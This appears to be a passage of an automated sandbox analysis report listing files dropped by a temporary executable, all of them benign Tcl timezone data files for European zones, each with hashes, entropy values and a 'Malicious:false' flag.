                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Europe/Belgrade) {. {-9223372036854775808 4920 0 LMT}. {-2713915320 3600 0 CET}. {-905824800 3600 0 CET}. {-857257200 3600 0 CET}. {-844556400 7200 1 CEST}. {-828226800 3600 0 CET}. {-812502000 7200 1 CEST}. {-796777200 3600 0 CET}. {-788922000 3600 0 CET}. {-777942000 7200 1 CEST}. {-766623600 3600 0 CET}. {407199600 3600 0 CET}. {417574800 7200 1 CEST}. {433299600 3600 0 CET}. {449024400 7200 1 CEST}. {465354000 3600 0 CET}. {481078800 7200 1 CEST}. {496803600 3600 0 CET}. {512528400 7200 1 CEST}. {528253200 3600 0 CET}. {543978000 7200 1 CEST}. {559702800 3600 0 CET}. {575427600 7200 1 CEST}. {591152400 3600 0 CET}. {606877200 7200 1 CEST}. {622602000 3600 0 CET}. {638326800 7200 1 CEST}. {654656400 3600 0 CET}. {670381200 7200 1 CEST}. {686106000 3600 0 CET}. {701830800 7200 1 CEST}. {717555600 3600 0 CET}. {733280400 7200 1 CES
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):7746
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.733442486698092
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:96:hgt67dAtcRbjOP9/V+H4Mnb4Nkrloy4xBqffZRgKs0AzxAHTdIVaAq0VZQltUbAT:hiGRNH4Mn82rlo6XIZ9ALeBO
                                                                                                                                                                                                                                                                                                                                MD5:D1E45A4660E00A361729FCD7413361C1
                                                                                                                                                                                                                                                                                                                                SHA1:BCC709103D07748E909DD999A954DFF7034F065F
                                                                                                                                                                                                                                                                                                                                SHA-256:EAD23E3F58706F79584C1F3F9944A48670F428CACBE9A344A52E19B541AB4F66
                                                                                                                                                                                                                                                                                                                                SHA-512:E3A0E6B4FC80A8D0215C81E95F9D3F71C0D9371EE0F6B2B7E966744C42FC64055370D322918EEA2917BFBA07030629C4493ADA257F9BD9C9BF6AD3C4A7FB1E70
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Europe/Berlin) {. {-9223372036854775808 3208 0 LMT}. {-2422054408 3600 0 CET}. {-1693706400 7200 1 CEST}. {-1680483600 3600 0 CET}. {-1663455600 7200 1 CEST}. {-1650150000 3600 0 CET}. {-1632006000 7200 1 CEST}. {-1618700400 3600 0 CET}. {-938905200 7200 1 CEST}. {-857257200 3600 0 CET}. {-844556400 7200 1 CEST}. {-828226800 3600 0 CET}. {-812502000 7200 1 CEST}. {-796777200 3600 0 CET}. {-781052400 7200 1 CEST}. {-776559600 10800 0 CEMT}. {-765936000 7200 1 CEST}. {-761180400 3600 0 CET}. {-757386000 3600 0 CET}. {-748479600 7200 1 CEST}. {-733273200 3600 0 CET}. {-717631200 7200 1 CEST}. {-714610800 10800 1 CEMT}. {-710380800 7200 1 CEST}. {-701910000 3600 0 CET}. {-684975600 7200 1 CEST}. {-670460400 3600 0 CET}. {-654130800 7200 1 CEST}. {-639010800 3600 0 CET}. {315529200 3600 0 CET}. {323830800 7200 1 CEST}. {338950800 3600 0 CET
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):180
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.89628096026481
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqxVtXrAevFVAIgoquXrELyQahcvEB5yQazXrY:SlSWB9IZaM3ymzbAevFVAIgozbELy7cY
                                                                                                                                                                                                                                                                                                                                MD5:7C0606BC846344D78A85B4C14CE85B95
                                                                                                                                                                                                                                                                                                                                SHA1:CEDFDC3C81E519413DDD634477533C89E8AF2E35
                                                                                                                                                                                                                                                                                                                                SHA-256:D7DF89C23D2803683FE3DB57BF326846C9B50E8685CCCF4230F24A5F4DC8E44E
                                                                                                                                                                                                                                                                                                                                SHA-512:8F07791DE5796B418FFD8945AE13BAB1C9842B8DDC073ED64E12EA8985619B93472C39DD44DA8FAEF5614F4E6B4A9D96E0F52B4ECA11B2CCA9806D2F8DDF2778
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Europe/Prague)]} {. LoadTimeZoneFile Europe/Prague.}.set TZData(:Europe/Bratislava) $TZData(:Europe/Prague).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):8907
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.75854119398076
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:96:BMlf+jdXtSYv9HMn2vDGwdSscRbjOP9/V+H4Mnb4Nkrloy4xBqffZRgKs0AzxAHL:BMQSY1RSTRNH4Mn82rlo6XIZ9ALeBO
                                                                                                                                                                                                                                                                                                                                MD5:FA802B103E8829C07AE7E05DE7F3CD1F
                                                                                                                                                                                                                                                                                                                                SHA1:46AFB26E3E9102F0544C5294DA67DC41E8B2E8FC
                                                                                                                                                                                                                                                                                                                                SHA-256:AEB5860C2F041842229353E3F83CC2FEBC9518B115F869128E94A1605FB4A759
                                                                                                                                                                                                                                                                                                                                SHA-512:488CE6B524071D2B72F8AD73C2DC00F5F4C1C3C93F91165BDA0BCCB2B2C644B792C4220B785E84835ABE81584FDC87A1DCDA7679A69318052C3854167CB43C61
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Europe/Brussels) {. {-9223372036854775808 1050 0 LMT}. {-2840141850 1050 0 BMT}. {-2450953050 0 0 WET}. {-1740355200 3600 0 CET}. {-1693702800 7200 0 CEST}. {-1680483600 3600 0 CET}. {-1663455600 7200 1 CEST}. {-1650150000 3600 0 CET}. {-1632006000 7200 1 CEST}. {-1618700400 3600 0 CET}. {-1613826000 0 0 WET}. {-1604278800 3600 1 WEST}. {-1585530000 0 0 WET}. {-1574038800 3600 1 WEST}. {-1552266000 0 0 WET}. {-1539997200 3600 1 WEST}. {-1520557200 0 0 WET}. {-1507510800 3600 1 WEST}. {-1490576400 0 0 WET}. {-1473642000 3600 1 WEST}. {-1459126800 0 0 WET}. {-1444006800 3600 1 WEST}. {-1427677200 0 0 WET}. {-1411952400 3600 1 WEST}. {-1396227600 0 0 WET}. {-1379293200 3600 1 WEST}. {-1364778000 0 0 WET}. {-1348448400 3600 1 WEST}. {-1333328400 0 0 WET}. {-1316394000 3600 1 WEST}. {-1301263200 0 0 WET}. {-1284328800 3600 1 WEST}. {-126
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):7706
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.6365022673390808
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:96:nQrdI+sYixX215VaKl9sUM2kNU4tztagAwkY5V778e27zo2yiQ6kjmyykeP2lwtk:nQrbEm1Oh2kNU4tB715pyzHy1gA
                                                                                                                                                                                                                                                                                                                                MD5:79AAB44507DD6D06FA673CA20D4CF223
                                                                                                                                                                                                                                                                                                                                SHA1:A2F1AA0E3F38EF24CD953C6B5E1EC29EA3EDB8C0
                                                                                                                                                                                                                                                                                                                                SHA-256:C40DC0C9EE5FFF9F329823325A71F3F38BE940F159E64E0B0CED27B280C1F318
                                                                                                                                                                                                                                                                                                                                SHA-512:BBEBB29FFD35A1F8B9D906795032976B3F69A0097ED7D764E3EB45574E66641C35F9006B3295FB090472FF5C09FC4D88D9249E924011A178EFB68D050AA6F871
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Europe/Bucharest) {. {-9223372036854775808 6264 0 LMT}. {-2469404664 6264 0 BMT}. {-1213148664 7200 0 EET}. {-1187056800 10800 1 EEST}. {-1175479200 7200 0 EET}. {-1159754400 10800 1 EEST}. {-1144029600 7200 0 EET}. {-1127700000 10800 1 EEST}. {-1111975200 7200 0 EET}. {-1096250400 10800 1 EEST}. {-1080525600 7200 0 EET}. {-1064800800 10800 1 EEST}. {-1049076000 7200 0 EET}. {-1033351200 10800 1 EEST}. {-1017626400 7200 0 EET}. {-1001901600 10800 1 EEST}. {-986176800 7200 0 EET}. {-970452000 10800 1 EEST}. {-954727200 7200 0 EET}. {296604000 10800 1 EEST}. {307486800 7200 0 EET}. {323816400 10800 1 EEST}. {338940000 7200 0 EET}. {354672000 10800 0 EEST}. {370396800 7200 0 EET}. {386121600 10800 1 EEST}. {401846400 7200 0 EET}. {417571200 10800 1 EEST}. {433296000 7200 0 EET}. {449020800 10800 1 EEST}. {465350400 7200 0 EET}. {481075200
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):7975
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.7352769955376464
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:96:ZpduGm56n0PcRbjOP9/V+H4Mnb4Nkrloy4xBqffZRgKs0AzxAHTdIVaAq0VZQlth:ZpMypRNH4Mn82rlo6XIZ9ALeBO
                                                                                                                                                                                                                                                                                                                                MD5:25864F8E5372B8E45B71D08667ED093C
                                                                                                                                                                                                                                                                                                                                SHA1:83463D25C839782E2619CD5BE613DA1BD08ACBB5
                                                                                                                                                                                                                                                                                                                                SHA-256:EF5CF8C9B3CA3F772A9C757A2CC1D561E00CB277A58E43ED583A450BBA654BF1
                                                                                                                                                                                                                                                                                                                                SHA-512:0DAB3CA0C82AA80A4F9CC04C191BE180EB41CCF87ADB31F26068D1E6A3A2F121678252E36E387B589552E6F7BA965F7E3F4633F1FD066FC7849B1FD554F39EC7
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Europe/Budapest) {. {-9223372036854775808 4580 0 LMT}. {-2500938980 3600 0 CET}. {-1693706400 7200 1 CEST}. {-1680483600 3600 0 CET}. {-1663455600 7200 1 CEST}. {-1650150000 3600 0 CET}. {-1640998800 3600 0 CET}. {-1633212000 7200 1 CEST}. {-1618700400 3600 0 CET}. {-1600466400 7200 1 CEST}. {-1581202800 3600 0 CET}. {-906771600 3600 0 CET}. {-857257200 3600 0 CET}. {-844556400 7200 1 CEST}. {-828226800 3600 0 CET}. {-812502000 7200 1 CEST}. {-796777200 3600 0 CET}. {-788922000 3600 0 CET}. {-778471200 7200 1 CEST}. {-762660000 3600 0 CET}. {-749689200 7200 1 CEST}. {-733359600 3600 0 CET}. {-717634800 7200 1 CEST}. {-701910000 3600 0 CET}. {-686185200 7200 1 CEST}. {-670460400 3600 0 CET}. {-654130800 7200 1 CEST}. {-639010800 3600 0 CET}. {-621990000 7200 1 CEST}. {-605660400 3600 0 CET}. {-492656400 7200 1 CEST}. {-481168800 3600 0
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):178
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.905738881351689
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqxVnCMPwVAIgoqkCMJW6yQahDZALMFB5h8Qa5CMP:SlSWB9IZaM3ym5XwVAIgo5Py7D17/8jH
                                                                                                                                                                                                                                                                                                                                MD5:811B7E0B0EDD151E52DF369B9017E7C0
                                                                                                                                                                                                                                                                                                                                SHA1:3C17D157A626F3AD7859BC0F667E0AB60E821D05
                                                                                                                                                                                                                                                                                                                                SHA-256:221C8BA73684ED7D8CD92978ED0A53A930500A2727621CE1ED96333787174E82
                                                                                                                                                                                                                                                                                                                                SHA-512:7F980E34BBCBC65BBF04526BF68684B3CE780611090392560569B414978709019D55F69368E98ADADC2C47116818A437D5C83F4E6CD40F4A1674D1CF90307CB5
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Europe/Zurich)]} {. LoadTimeZoneFile Europe/Zurich.}.set TZData(:Europe/Busingen) $TZData(:Europe/Zurich).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):7824
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.674889638637008
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:96:J2rdkayurpKXlGYtXfVA6bN3E48WLCtSYxUFtj2DVXvR2YuXOZp+eiXGEsTVVHU:J2r6G81T9bN3E48GCujWYqK
                                                                                                                                                                                                                                                                                                                                MD5:92966EE642028D4C44C90F86CA1440AA
                                                                                                                                                                                                                                                                                                                                SHA1:95F286585FF3A880F2F909E82F4C22C8F1D12BE3
                                                                                                                                                                                                                                                                                                                                SHA-256:E92FFABF4705F93C2A4AD675555AEBC3C9418AC71EEB487AF0F7CD4EAB0431CE
                                                                                                                                                                                                                                                                                                                                SHA-512:1D6018C83CA5998C590448FE98C59F3FCD0D5D7688B679B7F3C82B6F3209F25323BB302BF847FCCBD950F08A79AF36CA83DBDD4DB8A3557A682152A6B731B663
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Europe/Chisinau) {. {-9223372036854775808 6920 0 LMT}. {-2840147720 6900 0 CMT}. {-1637114100 6264 0 BMT}. {-1213148664 7200 0 EET}. {-1187056800 10800 1 EEST}. {-1175479200 7200 0 EET}. {-1159754400 10800 1 EEST}. {-1144029600 7200 0 EET}. {-1127700000 10800 1 EEST}. {-1111975200 7200 0 EET}. {-1096250400 10800 1 EEST}. {-1080525600 7200 0 EET}. {-1064800800 10800 1 EEST}. {-1049076000 7200 0 EET}. {-1033351200 10800 1 EEST}. {-1017626400 7200 0 EET}. {-1001901600 10800 1 EEST}. {-986176800 7200 0 EET}. {-970452000 10800 1 EEST}. {-954727200 7200 0 EET}. {-927165600 10800 1 EEST}. {-898138800 7200 0 CET}. {-857257200 3600 0 CET}. {-844556400 7200 1 CEST}. {-828226800 3600 0 CET}. {-812502000 7200 1 CEST}. {-800154000 10800 0 MSD}. {354920400 14400 1 MSD}. {370728000 10800 0 MSK}. {386456400 14400 1 MSD}. {402264000 10800 0 MSK}. {4179
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):7458
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.736544358182077
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:96:1Fpd6z8cRbjOP9/V+H4Mnb4Nkrloy4xBqffZRgKs0AzxAHTdIVaAq0VZQltUbAyo:1FpoRNH4Mn82rlo6XIZ9ALeBO
                                                                                                                                                                                                                                                                                                                                MD5:8FBF425E5833012C0A6276222721A106
                                                                                                                                                                                                                                                                                                                                SHA1:78C5788ED4184A62E0E2986CC0F39EED3801AD76
                                                                                                                                                                                                                                                                                                                                SHA-256:D2D091740C425C72C46ADDC23799FC431B699B80D244E4BCD7F42E31C1238EEB
                                                                                                                                                                                                                                                                                                                                SHA-512:6DF08142EEBC7AF8A575DD7510B83DBD0E15DDA13801777684355937338CDA3D09E37527912F4EBBCC1B8758E3D65185E6006EB5C1349D1DC3AE7B6131105691
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Europe/Copenhagen) {. {-9223372036854775808 3020 0 LMT}. {-2524524620 3020 0 CMT}. {-2398294220 3600 0 CET}. {-1692496800 7200 1 CEST}. {-1680490800 3600 0 CET}. {-935110800 7200 1 CEST}. {-857257200 3600 0 CET}. {-844556400 7200 1 CEST}. {-828226800 3600 0 CET}. {-812502000 7200 1 CEST}. {-796777200 3600 0 CET}. {-781052400 7200 0 CEST}. {-769388400 3600 0 CET}. {-747010800 7200 1 CEST}. {-736383600 3600 0 CET}. {-715215600 7200 1 CEST}. {-706748400 3600 0 CET}. {-683161200 7200 1 CEST}. {-675298800 3600 0 CET}. {315529200 3600 0 CET}. {323830800 7200 1 CEST}. {338950800 3600 0 CET}. {354675600 7200 1 CEST}. {370400400 3600 0 CET}. {386125200 7200 1 CEST}. {401850000 3600 0 CET}. {417574800 7200 1 CEST}. {433299600 3600 0 CET}. {449024400 7200 1 CEST}. {465354000 3600 0 CET}. {481078800 7200 1 CEST}. {496803600 3600 0 CET}. {512528
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):9452
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.675115548319436
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:192:fIfr7ZO/H8XKKRg3psTZ+wfAIt3/LIjzI9jJeK:fIHZO/Hk5RmpsT7/sjzI9jJeK
                                                                                                                                                                                                                                                                                                                                MD5:D9787AD03D1A020F01FFF1F9AB346C09
                                                                                                                                                                                                                                                                                                                                SHA1:C194A0A7F218ABBEB7DB53E3B2062DC349A8C739
                                                                                                                                                                                                                                                                                                                                SHA-256:E1DCBC878C8937FBE378033AEE6B0D8C72827BE3D9C094815BFA47AF92130792
                                                                                                                                                                                                                                                                                                                                SHA-512:4C596C9BDE55605381C9B6F90837BA8C9EA2992EBC7F3ACDC207CFAE7612E8B13415FD4962DC8D3FD2A75D98025D0E052B8B8486F6C31742D791C6A2C1D1827F
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Europe/Dublin) {. {-9223372036854775808 -1500 0 LMT}. {-2821649700 -1521 0 DMT}. {-1691962479 2079 1 IST}. {-1680471279 0 0 GMT}. {-1664143200 3600 1 BST}. {-1650146400 0 0 GMT}. {-1633903200 3600 1 BST}. {-1617487200 0 0 GMT}. {-1601848800 3600 1 BST}. {-1586037600 0 0 GMT}. {-1570399200 3600 1 BST}. {-1552168800 0 0 GMT}. {-1538344800 3600 1 BST}. {-1522533600 0 0 GMT}. {-1517011200 0 0 IST}. {-1507500000 3600 1 IST}. {-1490565600 0 0 IST}. {-1473631200 3600 1 IST}. {-1460930400 0 0 IST}. {-1442786400 3600 1 IST}. {-1428876000 0 0 IST}. {-1410732000 3600 1 IST}. {-1396216800 0 0 IST}. {-1379282400 3600 1 IST}. {-1364767200 0 0 IST}. {-1348437600 3600 1 IST}. {-1333317600 0 0 IST}. {-1315778400 3600 1 IST}. {-1301263200 0 0 IST}. {-1284328800 3600 1 IST}. {-1269813600 0 0 IST}. {-1253484000 3600 1 IST}. {-1238364000 0 0 IST}. {-
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):9181
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.7982744899840535
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:96:i2elBN44y3UKdDDMjEZtcRbjOP9/V+H4Mnb4Nkrloy4xBqffZRgKs0AzxAHTdIV0:i44y1xZGRNH4Mn82rlo6XIZ9ALeBO
                                                                                                                                                                                                                                                                                                                                MD5:F8AEFE8F561ED7E1DC81117676F7D0E0
                                                                                                                                                                                                                                                                                                                                SHA1:1148176C2766B205B5D459A620D736B1D28283AA
                                                                                                                                                                                                                                                                                                                                SHA-256:FB771A01326E1756C4026365BEE44A6B0FEF3876BF5463EFAB7CF4B97BF87CFC
                                                                                                                                                                                                                                                                                                                                SHA-512:7C06CB215B920911E0DC9D24F0DD6E24DEC3D75FB2D0F175A9B4329304C9761FFFEE329DD797FF4343B41119397D7772D1D3DFC8F90C1DE205380DE463F42854
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Europe/Gibraltar) {. {-9223372036854775808 -1284 0 LMT}. {-2821649916 0 0 GMT}. {-1691964000 3600 1 BST}. {-1680472800 0 0 GMT}. {-1664143200 3600 1 BST}. {-1650146400 0 0 GMT}. {-1633903200 3600 1 BST}. {-1617487200 0 0 GMT}. {-1601848800 3600 1 BST}. {-1586037600 0 0 GMT}. {-1570399200 3600 1 BST}. {-1552168800 0 0 GMT}. {-1538344800 3600 1 BST}. {-1522533600 0 0 GMT}. {-1507500000 3600 1 BST}. {-1490565600 0 0 GMT}. {-1473631200 3600 1 BST}. {-1460930400 0 0 GMT}. {-1442786400 3600 1 BST}. {-1428876000 0 0 GMT}. {-1410732000 3600 1 BST}. {-1396216800 0 0 GMT}. {-1379282400 3600 1 BST}. {-1364767200 0 0 GMT}. {-1348437600 3600 1 BST}. {-1333317600 0 0 GMT}. {-1315778400 3600 1 BST}. {-1301263200 0 0 GMT}. {-1284328800 3600 1 BST}. {-1269813600 0 0 GMT}. {-1253484000 3600 1 BST}. {-1238364000 0 0 GMT}. {-1221429600 3600 1 BST}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):178
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.830450830776494
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqxVxKL82wFVAIgoqyKL8p6yQakQAL/yQavKL8i:SlSWB9IZaM3ymvKA2wFVAIgovKAUyYL5
                                                                                                                                                                                                                                                                                                                                MD5:DC2B3CAC4AF70A61D0F4C53288CC8D11
                                                                                                                                                                                                                                                                                                                                SHA1:A423E06F88FDEED1960AF3C46A67F1CB9F293CAF
                                                                                                                                                                                                                                                                                                                                SHA-256:9CB6E6FEC9461F94897F0310BFC3682A1134E284A56C729E7F4BCE726C2E2380
                                                                                                                                                                                                                                                                                                                                SHA-512:8B455DA1D1A7AA1259E6E5A5CF90E62BA8073F769DCB8EB82503F2DFB70AA4539A688DC798880339A2722AA1871E8C8F16D8827064A2D7D8F2F232880359C78D
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Europe/London)]} {. LoadTimeZoneFile Europe/London.}.set TZData(:Europe/Guernsey) $TZData(:Europe/London).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):7120
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.635790220811118
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:96:wQbXHk+PVqVaKl9sUM2kNU4tztagAwkY5V778e27zo2yiQ6kjmyykeP2lwtOEZ9A:w6XPzh2kNU4tB715pyzHy1gA
                                                                                                                                                                                                                                                                                                                                MD5:E7A6AA8962067EF71174CD5AE79A8624
                                                                                                                                                                                                                                                                                                                                SHA1:1250689DF0DFCCDD4B6B21C7867C4AA515D19ECD
                                                                                                                                                                                                                                                                                                                                SHA-256:5FDBE427BC604FAC03316FD08138F140841C8CF2537CDF4B4BB20F2A9DFC4ECB
                                                                                                                                                                                                                                                                                                                                SHA-512:5C590164499C4649D555F30054ECB5CF627CCCA8A9F94842328E90DD40477CADB1042D07EA4C368ABB7094D7A59A8C2EE7619E5B3458A0FAC066979B14AF44A6
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Europe/Helsinki) {. {-9223372036854775808 5989 0 LMT}. {-2890258789 5989 0 HMT}. {-1535938789 7200 0 EET}. {-875671200 10800 1 EEST}. {-859773600 7200 0 EET}. {354672000 10800 1 EEST}. {370396800 7200 0 EET}. {386121600 10800 1 EEST}. {401846400 7200 0 EET}. {410220000 7200 0 EET}. {417574800 10800 1 EEST}. {433299600 7200 0 EET}. {449024400 10800 1 EEST}. {465354000 7200 0 EET}. {481078800 10800 1 EEST}. {496803600 7200 0 EET}. {512528400 10800 1 EEST}. {528253200 7200 0 EET}. {543978000 10800 1 EEST}. {559702800 7200 0 EET}. {575427600 10800 1 EEST}. {591152400 7200 0 EET}. {606877200 10800 1 EEST}. {622602000 7200 0 EET}. {638326800 10800 1 EEST}. {654656400 7200 0 EET}. {670381200 10800 1 EEST}. {686106000 7200 0 EET}. {701830800 10800 1 EEST}. {717555600 7200 0 EET}. {733280400 10800 1 EEST}. {749005200 7200 0 EET}. {764730000
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):181
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.866592240835745
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqxVxKL82wFVAIgoqyKL8p6yQaqpfioxp8QavKL8i:SlSWB9IZaM3ymvKA2wFVAIgovKAUycqO
                                                                                                                                                                                                                                                                                                                                MD5:9E18F66C32ADDDBCEDFE8A8B2135A0AC
                                                                                                                                                                                                                                                                                                                                SHA1:9D2DC5BE334B0C6AEA15A98624321D56F57C3CB1
                                                                                                                                                                                                                                                                                                                                SHA-256:6A03679D9748F4624078376D1FD05428ACD31E7CABBD31F4E38EBCCCF621C268
                                                                                                                                                                                                                                                                                                                                SHA-512:014BAD4EF0209026424BC68CBF3F5D2B22B325D61A4476F1E4F020E1EF9CD4B365213E01C7EC6D9D40FA422FE8FE0FADB1E4CBB7D46905499691A642D813A379
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Europe/London)]} {. LoadTimeZoneFile Europe/London.}.set TZData(:Europe/Isle_of_Man) $TZData(:Europe/London).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):3974
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.7140382290341214
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:96:kICNapz9QnPPWDeP/vamdc2MKJ9k2gsh6YlnG:kuQnPo+CWJipP
                                                                                                                                                                                                                                                                                                                                MD5:5F2F14127F11060A57C53565A24CB8F8
                                                                                                                                                                                                                                                                                                                                SHA1:E79FC982C018CC7E3C29A956048ED3D0CFFE3311
                                                                                                                                                                                                                                                                                                                                SHA-256:EAD62B6D04AA7623B9DF94D41E04C9E30C7BA8EB2CE3504105A0496A66EB87AE
                                                                                                                                                                                                                                                                                                                                SHA-512:E709849DEF7F7CDAE3CA44F1939DF49D6FE5DE9C89F541343256FC0F7B9E55390AC496FF599D94B7F594D6BAE724AE4608A43F5870C18210525B061E801CC36B
                                                                                                                                                                                                                                                                                                                                Malicious:false
